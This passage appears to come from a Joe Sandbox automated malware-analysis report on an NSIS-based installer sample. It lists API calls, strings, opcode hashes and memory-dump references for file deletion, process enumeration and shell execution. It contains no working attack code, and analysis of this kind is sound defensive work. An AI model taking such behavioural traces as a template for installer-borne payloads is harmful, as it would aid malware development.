                                                                                                                                                                                                                                                                                                      • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                                      • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                                      • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                      • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429A95,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                      • String ID: F$A
                                                                                                                                                                                                                                                                                                      • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                                      • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                      • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                      • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                      • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                      • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                      • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429A95,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00429A95,762323A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                      • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                      • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                                      • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                      • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                      • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                      • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                                      • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                      • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                      • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                      • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                      • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                      • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                                      • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                      • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                      • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
